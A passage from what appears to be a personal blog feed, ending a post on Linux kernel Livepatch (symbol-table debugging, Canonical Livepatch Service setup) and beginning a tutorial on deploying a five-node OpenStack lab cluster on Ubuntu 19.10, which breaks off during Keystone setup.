92714: ffffffff8248f93c 0 NOTYPE LOCAL DEFAULT 97899 __ksymtab_dump_skip
92715: ffffffff824b80c1 10 OBJECT LOCAL DEFAULT 97903 __kstrtab_dump_skip
92716: ffffffff8248f90c 0 NOTYPE LOCAL DEFAULT 97899 __ksymtab_dump_align
92717: ffffffff824b80b6 11 OBJECT LOCAL DEFAULT 97903 __kstrtab_dump_align
92718: ffffffff8248f954 0 NOTYPE LOCAL DEFAULT 97899 __ksymtab_dump_truncate
92719: ffffffff824b80a8 14 OBJECT LOCAL DEFAULT 97903 __kstrtab_dump_truncate
92720: ffffffff814baff0 156 FUNC LOCAL DEFAULT 8647 umh_pipe_setup
92721: ffffffff81761a10 208 FUNC LOCAL DEFAULT 32162 zap_process
92722: ffffffff81761ba0 100 FUNC LOCAL DEFAULT 32166 expand_corename.isra.0
92723: ffffffff8276d518 4 OBJECT LOCAL DEFAULT 106303 core_name_size
92724: ffffffff81761c10 195 FUNC LOCAL DEFAULT 32168 cn_vprintf
92725: ffffffff81761ce0 106 FUNC LOCAL DEFAULT 32170 cn_printf
92726: ffffffff81761d50 247 FUNC LOCAL DEFAULT 32172 cn_esc_printf
92727: ffffffff83017f60 4096 OBJECT LOCAL DEFAULT 117495 zeroes.62762
92728: ffffffff82ec62d0 0 OBJECT LOCAL DEFAULT 116793 __key.10435
92729: ffffffff83018f60 4 OBJECT LOCAL DEFAULT 117496 core_dump_count.62719
92730: ffffffff81761f16 27 FUNC LOCAL DEFAULT 32178 do_coredump.cold
92731: ffffffff822adba0 12 OBJECT LOCAL DEFAULT 97893 __func__.62732
...
</code></pre></div></div>
<p>If you look closely, the original vmlinux has the following two symbols:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 30010: ffffffff81361660 1383 FUNC LOCAL DEFAULT 1 format_corename.isra.0
30011: ffffffff81361bd0 36 FUNC LOCAL DEFAULT 1 kmalloc_array.constprop.0
</code></pre></div></div>
<p>While the built one does not! There are symbols missing from our freshly built
vmlinux binary. This is likely down to GCC’s “ISRA” optimisation pass
(interprocedural scalar replacement of aggregates), which clones a function with
a changed signature and appends the <code class="language-plaintext highlighter-rouge">.isra</code> suffix. Maybe compiler flags are
slightly different between builds. I am not sure. All I do know is that this
patch has problems.</p>
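<p>When investigating cases like this, it can help to compare the optimised local
symbols between the two binaries up front, along these lines:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ readelf -s /lib/debug/boot/vmlinux-5.4.0-24-generic | grep -E 'format_corename|kmalloc_array'
$ readelf -s ~/.kpatch/src/vmlinux | grep -E 'format_corename|kmalloc_array'
# if the .isra / .constprop suffixed names differ between the two binaries,
# create-diff-object's find_local_syms will fail just like it did above
</code></pre></div></div>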
<h2 id="limitations-in-livepatch">Limitations in Livepatch</h2>
<p>As we can see, there are some real limitations to which patches are suitable for
Livepatch. This is probably the biggest reason why Livepatches are reserved for
security fixes only, since most normal fixes won’t work.</p>
<p>The best cheat sheet for what patches work is the <a href="https://github.com/dynup/kpatch/blob/master/doc/patch-author-guide.md">Patch Author Guide</a>
in the kpatch repository.</p>
<p>As soon as I can fix a real bug with Livepatch, I will write a follow up blogpost.</p>
<h1 id="installing-and-configuring-livepatch-on-ubuntu">Installing and Configuring Livepatch on Ubuntu</h1>
<p>Interested in using Livepatch in your production environment, but don’t want to
navigate all the complexity behind researching compatible patches, writing or
generating Livepatch modules, testing for regressions or scaling deployment?</p>
<p>Well, you can use the <a href="https://ubuntu.com/livepatch">Canonical Livepatch Service</a>.</p>
<p>The Canonical Livepatch Service is easy to set up, and automatically delivers
critical security fixes to your machines. These Livepatches have been thoroughly
tested and are safe to use.</p>
<p>You can find a list of supported distribution releases and kernel versions
on the <a href="https://wiki.ubuntu.com/Kernel/Livepatch">Livepatch Wiki page</a>.</p>
<p>The rule of thumb is that Livepatch is available for LTS GA kernels, and for HWE
kernels which come from the next LTS GA kernel.</p>
<p>So, for example, the 4.4 GA kernel on Xenial, or the 4.15 HWE kernel on Xenial,
since it was Bionic’s GA kernel. Bionic has 4.15 and, soon, the 5.4 HWE kernel
from Focal.</p>
<p>Getting the Canonical Livepatch Service running takes only a few steps:</p>
<ol>
<li>Visit the <a href="https://auth.livepatch.canonical.com/">Canonical Livepatch Portal</a> to generate your API key.</li>
<li>Install the Livepatch system daemon with <code class="language-plaintext highlighter-rouge">$ sudo snap install canonical-livepatch</code></li>
<li>Setup Livepatch with the API key: <code class="language-plaintext highlighter-rouge">$ sudo canonical-livepatch enable <TOKEN></code></li>
</ol>
<p>You can try Livepatch for free for up to 3 machines, which is pretty neat if
you want to use it on your own personal PC or server. If you need to scale for your
production environment, then you can sign up for <a href="https://ubuntu.com/support">Ubuntu Advantage</a>
which includes the Canonical Livepatch Service.</p>
<p>The <a href="https://assets.ubuntu.com/v1/ef19ede0-Datasheet_Livepatch_AW_Web_30.07.18.pdf">Datasheet</a>
covers any more questions you might have, such as on-premise availability or
pricing.</p>
<p>So how do we tell if the Canonical Livepatch Service is working? Well, you
can run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ canonical-livepatch status
last check: 1 minute ago
kernel: 4.4.0-168.197-generic
server check-in: succeeded
patch state: ✓ all applicable livepatch modules inserted
patch version: 65.1
</code></pre></div></div>
<p>We can also check dmesg, to see if the module has been inserted correctly:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 234.112955] lkp_Ubuntu_4_4_0_168_197_generic_65: loading out-of-tree module taints kernel.
[ 234.113077] lkp_Ubuntu_4_4_0_168_197_generic_65: module verification failed: signature and/or required key missing - tainting kernel
[ 237.331850] livepatch: tainting kernel with TAINT_LIVEPATCH
[ 237.331852] livepatch: enabling patch 'lkp_Ubuntu_4_4_0_168_197_generic_65'
</code></pre></div></div>
<p>We can see that we are running patch version 65.1. What does that mean? How
do we see what is in each patch?</p>
<p>Well, you can sign up for the <a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce">Ubuntu Security Announce</a> mailing list. All
new Livepatches are announced here, under <code class="language-plaintext highlighter-rouge">[LSN-VERSION]</code> tags. For example,
the patch we just installed above is documented here:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-April/005391.html">[LSN-0065-1] Linux kernel vulnerability</a></p>
<p>Otherwise you can also browse the source code repositories.</p>
<ul>
<li><a href="https://git.launchpad.net/~ubuntu-livepatch/+git/xenial-livepatches/">Xenial Livepatch Source Code</a></li>
<li><a href="https://git.launchpad.net/~ubuntu-livepatch/+git/bionic-livepatches/">Bionic Livepatch Source Code</a></li>
</ul>
<p>If we have a look at the <a href="https://git.launchpad.net/~ubuntu-livepatch/+git/xenial-livepatches/tree/Ubuntu-4.4.0-168.197/Ubuntu-4.4.0-168.197.diff">Xenial 65.1 patch for 4.4.0-168-generic</a>, we have vmx fixes, mwifiex wifi driver fixes, btrfs
fixes, and i915 graphics fixes. We can also see that they are built with
<code class="language-plaintext highlighter-rouge">kpatch-build</code>: <a href="https://git.launchpad.net/~ubuntu-livepatch/+git/xenial-livepatches/tree/Ubuntu-4.4.0-168.197/Makefile">Makefile for Xenial 65.1 patch</a>.</p>
<p>Most users probably aren’t interested in what is in their Livepatches, but if
you are, feel free to review.</p>
<h1 id="conclusion">Conclusion</h1>
<p>Well, there we have it. We looked into how Livepatch works at a semi-technical
level, we implemented a few Livepatches of our own and got them working.</p>
<p>It’s a pity that I haven’t managed to make a Livepatch to fix a real bug just
yet, since I keep selecting fixes which aren’t compatible, but as soon as I find
one which is, I will write another blog post about it.</p>
<p>We also had a look at the Canonical Livepatch Service, and I was pretty happy
with how easy it is to operate, compared to the endless trouble of making these
modules yourself.</p>
<p>I think Livepatch is a very cool kernel technology, so keep an eye out on future
blog posts where I delve into it some more.</p>
<p>I hope you enjoyed the read, and as always, feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellOne of the more recent killer features implemented by most major Linux distros these days is the ability to patch the kernel while it is running, without the need for a reboot. While this may sound like sorcery for some, this is a very real feature, called Livepatch. Livepatch uses ftrace in new and interesting ways, by patching in calls at the beginning of existing functions to new patched functions, delivered as kernel modules. This lets you update and fix bugs on the fly, although its use is typically reserved for security critical fixes only. The whole concept is extremely interesting, so today we will look into what Livepatch is, how it is implemented across several distros, we will write some Livepatches of our own, and look at how Livepatch works in Ubuntu for end users.Deploying an OpenStack Cluster in Ubuntu 19.102020-02-13T00:00:00+00:002020-02-13T00:00:00+00:00https://ruffell.nz/programming/writeups/2020/02/13/deploying-a-openstack-cluster-in-ubuntu-19.10<p>The next article in my series of learning about cloud computing is tackling one
of the larger and more widely used cloud software packages - OpenStack.</p>
<p>OpenStack is a service which lets you provision and manage virtual machines
across a pool of hardware which may have differing specifications and vendors.</p>
<p>Today, we will be deploying a small five node OpenStack cluster in Ubuntu 19.10
Eoan Ermine, so follow along, and let’s get this cluster running.</p>
<p><img src="/assets/images/2020_000.png" alt="hero" /></p>
<p>We will cover what OpenStack is, the services it is comprised of, how to deploy
it, and using our cluster to provision some virtual machines.</p>
<p>Let’s get started.</p>
<!--more-->
<h1 id="what-is-openstack">What is OpenStack?</h1>
<p>As mentioned previously, OpenStack is a service which lets you provision and
manage virtual machines running across a pool of hardware that provide
compute, networking or storage resources. This pool of hardware can be made up
with differing specifications or multiple vendors, or even different geographical
locations. OpenStack is the glue which connects these resources together in an
easy to use, secure, cohesive system for provisioning virtual machines to
public or private cloud environments.</p>
<h1 id="what-are-openstacks-main-usages">What are OpenStacks Main Usages?</h1>
<p>OpenStacks primary usage is to provide a platform for cloud computing. This can
be in the form of public or private clouds. Public clouds are open to the
public and anyone can sign up for an account on, and private clouds are typically
private and local to a single company.</p>
<p>OpenStack allows users to provision virtual machines of various specifications,
with a choice of operating systems, in various geographical locations, or
Availability Zones. OpenStack gives users the ability to build virtual
networks for their virtual machines to be connected to, and to specify how
those networks operate, allowing easy configuration of virtual routers,
switches and the like.</p>
<p>OpenStack takes care of all storage requirements, and offers backends for
block and object storage, which can be utilised by the virtual machines
themselves, and the applications running on top of them.</p>
<h1 id="openstack-architecture">OpenStack Architecture</h1>
<p>Like Ceph, OpenStack is not a monolithic program. Instead, it is comprised of a
set of specialised individual services, which are further split into a set of
sub-services. The best way to grasp the complexity of OpenStack is by looking
at an example <a href="https://docs.openstack.org/install-guide/get-started-logical-architecture.html">logical architecture diagram</a> provided in the
<a href="https://docs.openstack.org">OpenStack Documentation</a>.</p>
<p><img src="/assets/images/2020_001.png" alt="logical architecture" /></p>
<p>We are going to focus on the following core services:</p>
<ul>
<li><a href="https://docs.openstack.org/horizon/latest/"><strong>Horizon</strong></a>, a central dashboard
where users can manage resource and provision virtual machines.</li>
<li><a href="https://docs.openstack.org/keystone/latest/"><strong>Keystone</strong></a>, an identity and
authentication service which implements fine tuned permissions and access control.</li>
<li><a href="https://docs.openstack.org/nova/latest/"><strong>Nova</strong></a>, a compute engine which
hosts the virtual machines being provisioned.</li>
<li><a href="https://docs.openstack.org/neutron/latest/"><strong>Neutron</strong></a>, which implements
networking as a service, which can create virtual networks and virtual network
interfaces that can be attached to virtual machines managed by nova.</li>
<li><a href="https://docs.openstack.org/glance/latest/"><strong>Glance</strong></a>, an image service
which stores, fetches and provides operating system images for the virtual
machines.</li>
<li><a href="https://docs.openstack.org/cinder/latest/"><strong>Cinder</strong></a>, a block storage
service which delivers highly available and fault tolerant block storage for use
with virtual machines.</li>
<li><a href="https://docs.openstack.org/swift/latest/"><strong>Swift</strong></a>, a object storage
backend which consumes and stores single objects quickly and efficiently.</li>
</ul>
<p>Each of these core services appears on the example logical architecture diagram
encased within dotted lines. These lines show the border between what we
consider the logical unit for a service, like nova, and the smaller sub-services
which nova is comprised of.</p>
<p>Every OpenStack service will have an API sub-service, which is the endpoint
OpenStack services use to communicate with each other. Most OpenStack services
will also have their own database to store state and information required by the
sub-services.</p>
<p>Otherwise, sub-services are specific to the service itself. If we look at Nova,
we see sub-services nova-scheduler, nova-console, nova-cert, nova-compute,
nova-consoleauth and nova-conductor. Each of these can communicate with other
sub-services if necessary, and use central resources, like the Nova database
and the work queue. Each of these sub-services is separated into its own
process, and can be stopped, started and restarted independently of the other
sub-services.</p>
<h1 id="architecture-of-the-cluster-we-will-build">Architecture of the Cluster We Will Build</h1>
<p>Today, we are going to deploy OpenStack on a small 5 node cluster which will be
made of virtual machines. I highly recommend you use a desktop computer for this
as we are going to need a lot of ram and disk space.</p>
<p><img src="/assets/images/2020_002.png" alt="deployment" /></p>
<p>We will have five machines and two networks. Our machines will be controller,
compute, block-storage, object-storage-1 and object-storage-2. The names are
fairly self explanatory, and we can see the services each will be running in
the diagram.</p>
<p>For the networks, we will have a management network and a provider network.
The management network will be used for administrative tasks, such as
OpenStack services communicating between themselves via their API endpoints.
The provider network is the virtual network that instances will have their
virtual NICs attached to.</p>
<p>Once the installation is done, we will be accessing the cluster through the
horizon web interface through the controller machine.</p>
<h1 id="deploying-the-cluster">Deploying the Cluster</h1>
<p>Okay, let’s get moving. Time to fire up some virtual machines and start
configuring our cluster.</p>
<h2 id="setting-up-internal-networks">Setting Up Internal Networks</h2>
<p>As mentioned previously, we will have two networks, the management network
and the provider network. I’m going to be using the defaults suggested in the
<a href="https://docs.openstack.org/install-guide/">OpenStack Installation Guide</a>
especially when it comes to the <a href="https://docs.openstack.org/install-guide/overview.html#networking-option-1-provider-networks">provider network</a>.</p>
<p>The networks and their CIDRs will be:</p>
<ul>
<li><strong>Management Network</strong> - 10.0.0.0/24</li>
<li><strong>Provider Network</strong> - 203.0.113.0/24</li>
</ul>
<p>These networks need to be created in your virtualisation software. I’m using
<code class="language-plaintext highlighter-rouge">virt-manager</code>, and you can do this by going to <code class="language-plaintext highlighter-rouge">Edit > Connection Details...</code>
then making a new virtual network.</p>
<p><img src="/assets/images/2020_003.png" alt="virtual network" /></p>
<p>These networks will be internal networks for now. We will also attach a normal
NAT network to our VMs while we get things up and running, but we will remove
this when we are done, to leave us with an isolated cluster.</p>
<p>Go ahead and make both the management and provider networks.</p>
<p><img src="/assets/images/2020_004.png" alt="network pane" /></p>
<p>When you are done, you will have three networks.</p>
<h2 id="install-ubuntu-server">Install Ubuntu Server</h2>
<p>Create five virtual machines with the following specs:</p>
<ul>
<li><strong>controller</strong>: 4gb ram, 1 vcpu, 10gb disk.</li>
<li><strong>compute</strong>: 4gb ram, 1 vcpu, 10gb disk.</li>
<li><strong>block-storage</strong>: 4gb ram, 1 vcpu, 10gb disk, 10gb disk.</li>
<li><strong>object-storage-1</strong>: 4gb ram, 1 vcpu, 10gb disk, 10gb disk, 10gb disk.</li>
<li><strong>object-storage-2</strong>: 4gb ram, 1 vcpu, 10gb disk, 10gb disk, 10gb disk.</li>
</ul>
<p>If you are low on ram or disk space, you can shave some specs off the block
storage and object storage machines.</p>
<p>Attach the management network to all the machines. Attach the provider network
to the controller and compute machines. Probably best to do this before you
start the installation.</p>
<p>Go ahead and install Ubuntu 19.10 Eoan Ermine Server on them:</p>
<p><img src="/assets/images/2020_005.png" alt="ubuntu server" /></p>
<p>Make sure to say yes to installing openssh-server when asked. We will be needing
it.</p>
<h2 id="configure-ubuntu-server">Configure Ubuntu Server</h2>
<p>After the install is done, we need to configure some networking on our fresh
installs.</p>
<h3 id="setting-up-machine-networking">Setting Up Machine Networking</h3>
<p>Nothing too fancy here, we are going to set up a static IP for our interfaces.</p>
<p>Recent versions of Ubuntu Server use netplan for networking, which can
take some getting used to. It’s okay though, it’s not hard.</p>
<p>If you go to <code class="language-plaintext highlighter-rouge">/etc/netplan</code>, there will be a file called <code class="language-plaintext highlighter-rouge">50-cloud-init.yaml</code>.</p>
<p>cloud-init will have pre-populated it with all current network interfaces:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># This file is generated from information provided by
# the datasource. Changes to it will not persist across an instance.
# To disable cloud-init's network configuration capabilities, write a file
# /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg with the following:
# network: {config: disabled}
network:
ethernets:
enp1s0:
dhcp4: true
enp2s0:
dhcp4: true
enp3s0:
dhcp4: true
version: 2
</code></pre></div></div>
<p>We want our management and provider networks to have static IP addresses, so the
first thing is to determine what these interfaces are.</p>
<p>If you run <code class="language-plaintext highlighter-rouge">ip addr</code>, you will see something like:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1: lo:
inet 127.0.0.1/8 scope host lo
2: enp1s0:
inet 192.168.122.13/24 brd 192.168.122.255 scope global dynamic enp1s0
3: enp2s0:
inet 10.0.0.155/24 brd 10.0.0.255 scope global dynamic enp2s0
4: enp3s0:
inet 203.0.113.249/24 brd 203.0.113.255 scope global dynamic enp3s0
</code></pre></div></div>
<p>I cleaned up the output, since let’s face it, <code class="language-plaintext highlighter-rouge">ip addr</code> gives us information
overload, while <code class="language-plaintext highlighter-rouge">ifconfig</code> had nice output. Rest in peace <code class="language-plaintext highlighter-rouge">ifconfig</code>.</p>
<p>We see enp1s0 is the NAT network, enp2s0 is management network and enp3s0 is the
provider network.</p>
<p>Our nodes will have the following static IPs:</p>
<ul>
<li><strong>controller</strong>: management: 10.0.0.11, provider: 203.0.113.11</li>
<li><strong>compute</strong>: management: 10.0.0.21, provider: 203.0.113.21</li>
<li><strong>block-storage</strong>: management: 10.0.0.31</li>
<li><strong>object-storage-1</strong>: management: 10.0.0.41</li>
<li><strong>object-storage-2</strong>: management: 10.0.0.51</li>
</ul>
<p>So we need to edit our netplan configuration like this, for our controller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># This file is generated from information provided by
# the datasource. Changes to it will not persist across an instance.
# To disable cloud-init's network configuration capabilities, write a file
# /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg with the following:
# network: {config: disabled}
network:
ethernets:
enp1s0:
dhcp4: true
enp2s0:
dhcp4: no
addresses: [10.0.0.11/24]
enp3s0:
dhcp4: no
addresses: [203.0.113.11/24]
version: 2
</code></pre></div></div>
<p>When we are done, we can apply the changes with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo netplan apply
</code></pre></div></div>
<p>Reboot your machine, and when it comes back up, if we log in, we should see
our static IPs in place:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-26-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 26 Jan 2020 09:48:36 PM UTC
System load: 0.98 Users logged in: 0
Usage of /: 41.8% of 9.78GB IP address for enp1s0: 192.168.122.13
Memory usage: 4% IP address for enp2s0: 10.0.0.11
Swap usage: 0% IP address for enp3s0: 203.0.113.11
Processes: 131
0 updates can be installed immediately.
0 of these updates are security updates.
Last login: Sun Jan 26 21:39:04 2020 from 192.168.122.1
</code></pre></div></div>
<p>Not too bad at all! Now go and do the same for the rest of the machines.</p>
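<p>For reference, the compute node’s <code class="language-plaintext highlighter-rouge">50-cloud-init.yaml</code> ends up the same shape,
just with its own addresses from the table above (interface names may differ
between VMs):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>network:
  ethernets:
    enp1s0:
      dhcp4: true
    enp2s0:
      dhcp4: no
      addresses: [10.0.0.21/24]
    enp3s0:
      dhcp4: no
      addresses: [203.0.113.21/24]
  version: 2
</code></pre></div></div>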
<h3 id="configure-the-hosts-file">Configure the Hosts File</h3>
<p>Edit /etc/hosts on all the machines and place the following inside it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>10.0.0.11 controller
203.0.113.11 controller-api
10.0.0.21 compute
203.0.113.21 compute-api
10.0.0.31 block-storage
10.0.0.41 object-storage-1
10.0.0.51 object-storage-2
</code></pre></div></div>
<p>There will likely be an entry with the machine’s hostname at the top, that
redirects back to localhost. Something like <code class="language-plaintext highlighter-rouge">127.0.0.1 controller</code>. Make sure
to comment out this line, because we want <code class="language-plaintext highlighter-rouge">controller</code> to mean <code class="language-plaintext highlighter-rouge">10.0.0.11</code>
instead.</p>
<p>That should make things easier for us later on.</p>
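<p>A quick way to confirm the entries work (assuming the static IPs from the
previous step are in place) is to ping a couple of the names:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ping -c 1 controller
$ ping -c 1 block-storage
</code></pre></div></div>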
<h3 id="set-up-ntp-for-stable-timekeeping">Set Up NTP For Stable Timekeeping</h3>
<p>It is important for all our boxes to have aligned time, since OpenStack
requires a consistent time across all machines. We will use
chrony, with the controller as the master NTP server.</p>
<p>On all machines, install <code class="language-plaintext highlighter-rouge">chrony</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install chrony
</code></pre></div></div>
<p>The controller will have internet access, so we will configure the machines
to connect to the controller for NTP.</p>
<p>On the controller, edit <code class="language-plaintext highlighter-rouge">/etc/chrony/chrony.conf</code> and place the following at
the end:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/chrony/chrony.conf
...
# Allow our internal networked machines access to our chrony server
allow 10.0.0.0/24
</code></pre></div></div>
<p>Now we can configure the other machines to connect to the controller for NTP.
For all the configured “pools”, we need to comment them out, and set the
<code class="language-plaintext highlighter-rouge">server</code> to be the controller instead.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/chrony/chrony.conf
...
# Comment out the default pools:
#pool ntp.ubuntu.com iburst maxsources 4
#pool 0.ubuntu.pool.ntp.org iburst maxsources 1
#pool 1.ubuntu.pool.ntp.org iburst maxsources 1
#pool 2.ubuntu.pool.ntp.org iburst maxsources 2
# Use the controller as the NTP master server
server controller iburst
</code></pre></div></div>
<p>Save. Once that is done, we need to restart chrony on all systems:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart chrony
</code></pre></div></div>
<p>We can check the other machines get their time from the controller with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ chronyc sources
210 Number of sources = 1
MS Name/IP address Stratum Poll Reach LastRx Last sample
===============================================================================
^* controller 2 6 37 20 +20ns[ -214us] +/- 12ms
</code></pre></div></div>
<p>We should get something like this.</p>
<h3 id="installing-openstack-client-packages">Installing OpenStack Client Packages</h3>
<p>We will be using the python OpenStack client to deploy our cluster, so go ahead
and install it on all machines:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install python3-openstackclient
</code></pre></div></div>
<h3 id="installing-a-database-on-the-controller">Installing a Database on the Controller</h3>
<p>We need to install a database on the controller, so let’s use mariadb:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install mariadb-server python3-pymysql
</code></pre></div></div>
<p>Let’s put some basic configuration in it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/mysql/mariadb.conf.d/99-openstack.cnf
[mysqld]
bind-address = 10.0.0.11
default-storage-engine = innodb
innodb_file_per_table = on
max_connections = 4096
collation-server = utf8_general_ci
character-set-server = utf8
</code></pre></div></div>
<p>Then we restart the service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart mysql
</code></pre></div></div>
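<p>To double-check that MariaDB is now listening on the management address rather
than localhost, something like this will do (3306 being the MariaDB default port):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ss -tln | grep 3306
# expect the listening socket to be bound to 10.0.0.11:3306
</code></pre></div></div>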
<p>All that’s left is to clear out the demo users and set a root database password:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql_secure_installation
</code></pre></div></div>
<p>When asked for the current root password, it will be blank. When we set the
new root password, use something decent, but if you’re doing this for fun, like
I am, then it probably doesn’t matter too much. We will use <code class="language-plaintext highlighter-rouge">password123</code>.</p>
<p>From there, say yes to the defaults.</p>
<h3 id="installing-a-messaging-queue-on-the-controller">Installing a Messaging Queue on the Controller</h3>
<p>We also need a messaging queue on the controller, so let’s use rabbitmq.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install rabbitmq-server
</code></pre></div></div>
<p>Let’s add a user:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo rabbitmqctl add_user openstack password123
Adding user "openstack" ...
</code></pre></div></div>
<p>And let the <code class="language-plaintext highlighter-rouge">openstack</code> user have all permissions to the queue:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo rabbitmqctl set_permissions openstack ".*" ".*" ".*"
Setting permissions for user "openstack" in vhost "/" ...
</code></pre></div></div>
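<p>Both the user and its permissions can be verified with the standard rabbitmqctl
subcommands:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo rabbitmqctl list_users
$ sudo rabbitmqctl list_permissions
</code></pre></div></div>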
<h3 id="installing-memcached-to-the-controller">Installing Memcached to the Controller</h3>
<p>We will be using memcached to cache parts of horizon, so go ahead and install
it on the controller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install memcached python3-memcache
</code></pre></div></div>
<p>We need to edit the config to use the internal management network, so change the
listening address from <code class="language-plaintext highlighter-rouge">127.0.0.1</code> to <code class="language-plaintext highlighter-rouge">10.0.0.11</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo vim /etc/memcached.conf
#-l 127.0.0.1
-l 10.0.0.11
</code></pre></div></div>
<p>From there restart the memcached service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart memcached
</code></pre></div></div>
<h1 id="installing-openstack">Installing OpenStack</h1>
<p>OpenStack is a series of services, and we will install them one at a time.</p>
<h2 id="installing-keystone-the-identity-service">Installing Keystone, the Identity Service</h2>
<p>Keystone is the identity service for OpenStack, and it maintains user
authentication, user authorisation and the catalogue of currently installed and
running OpenStack services, as well as their endpoint information.</p>
<p>Every other OpenStack service has a hard dependency on Keystone for its
authentication capabilities, and to get themselves enlisted into the catalogue,
so naturally Keystone needs to be installed first.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/keystone/train/install/">Keystone Installation Tutorial</a>.</p>
<h3 id="making-the-keystone-database">Making the Keystone Database</h3>
<p>Keystone needs a backing database, so open up mysql with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 44
Server version: 10.3.20-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
</code></pre></div></div>
<p>From there make a database:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> create database keystone;
Query OK, 1 row affected (0.001 sec)
</code></pre></div></div>
<p>We then need to make a keystone user, and let them have access to the database:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> grant all privileges on keystone.* to 'keystone'@'localhost'
identified by 'password123';
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> grant all privileges on keystone.* to 'keystone'@'%'
identified by 'password123';
Query OK, 0 rows affected (0.001 sec)
</code></pre></div></div>
<h3 id="installing-keystone-packages">Installing Keystone Packages</h3>
<p>Keystone is available in the Ubuntu main archive, so we can install it with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install keystone apache2 libapache2-mod-wsgi-py3
</code></pre></div></div>
<p>From there, we can configure it by adding some credentials to its configuration
file. You will want to jump to the <code class="language-plaintext highlighter-rouge">database</code> section, comment out the sqlite
connection, and add our mariadb database. Also, under the <code class="language-plaintext highlighter-rouge">token</code> section,
uncomment the <code class="language-plaintext highlighter-rouge">provider = fernet</code> line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/keystone/keystone.conf
[database]
#connection = sqlite:////var/lib/keystone/keystone.db
connection = mysql+pymysql://keystone:password123@controller/keystone
[token]
provider = fernet
</code></pre></div></div>
<p>We can then populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "keystone-manage db_sync" keystone
</code></pre></div></div>
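<p>As a quick sanity check that the schema landed, you can list a few of the
freshly created tables (the exact table list varies between releases):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql -e "use keystone; show tables;" | head
</code></pre></div></div>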
<p>Once the database is populated, we need to initialise the fernet key repositories:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo keystone-manage fernet_setup --keystone-user keystone --keystone-group \
keystone
$ sudo keystone-manage credential_setup --keystone-user keystone --keystone-group \
keystone
</code></pre></div></div>
<p>After that, we can bootstrap keystone by telling it where its API endpoints
will be accessed from, and what our region name will be.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo keystone-manage bootstrap --bootstrap-password openstack \
--bootstrap-admin-url http://controller:5000/v3/ \
--bootstrap-internal-url http://controller:5000/v3/ \
